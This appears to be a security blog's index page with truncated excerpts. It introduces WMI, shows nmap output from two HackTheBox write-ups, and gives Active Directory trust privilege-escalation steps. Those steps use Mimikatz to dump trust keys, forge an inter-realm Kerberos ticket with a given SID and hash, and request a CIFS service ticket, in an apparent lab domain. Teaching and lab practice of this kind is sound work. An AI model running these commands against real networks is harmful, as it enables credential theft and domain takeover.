Powershell * WMI

WMI Introduction

WMI is a windows Management Instrumentation which Microsoft implement for common information model (CIM). Its give us uniform interface for applications and scripts to manage a local or remote computer or network. It contains implement : Managed object format Providers Managed Object Namespaces Repository Consumers MOF Files: We can find the .mof file on this […]

HACKTHEBOX * Vulnerable Machine Writeup


root@kali:~/Downloads# nmap -A Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-20 22:42 EDT Nmap scan report for Host is up (0.14s latency). Not shown: 999 closed ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.25 ((Debian)) |_http-server-header: Apache/2.4.25 (Debian) |_http-title: Blackhat highschool No exact OS matches for host (If you know […]

HACKTHEBOX * Vulnerable Machine Writeup


root@kali:~/Downloads# nmap -A Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-20 13:51 GMT Nmap scan report for Host is up (0.25s latency). Not shown: 998 filtered ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 49:e8:f1:2a:80:62:de:7e:02:40:a1:f4:30:d2:88:a6 (RSA) | 256 c8:02:cf:a0:f2:d8:5d:4f:7d:c7:66:0b:4d:5d:0b:df (ECDSA) |_ […]


Privilege Escalation Across Trust

Priv esc across domains : trust tickets: PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerSploit-master\PowerSploit-master\Exfiltration> Invoke-Mimikatz -Command ‘”lsadump::trust /patch”‘ An inter-realm TGT can be forged: PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerSploit-master\PowerSploit-master\Exfiltration> Invoke-Mimikatz -Command ‘”kerberos::golden /domain:security.local /sid:S-1-5-21-1200125816-2926698244-2119389380-502 /sid:S-1-5-21-1200125816-2926698244-2119389380-502 /rc4:62e72bcfbac429fa51d15ec57caa506d /user:administrator /service:krbtgt /target:security.local /ticket:ticket.kirbi”‘ Gets a TGT for a service (CIFS below) in the target domain by using the forged trust ticket. PS C:\Users\victim6\Downloads\Ghostpack-CompiledBinaries-master\Ghostpack-CompiledBinaries-master> asktgs.exe C:\Users\victim6\Downloads\new\new\tool\tool\PowerSploit-master\PowerSploit-master\Exfiltration\ticket.kirbi CIFS/WIN-2RUMVG5JPOC.security.local […]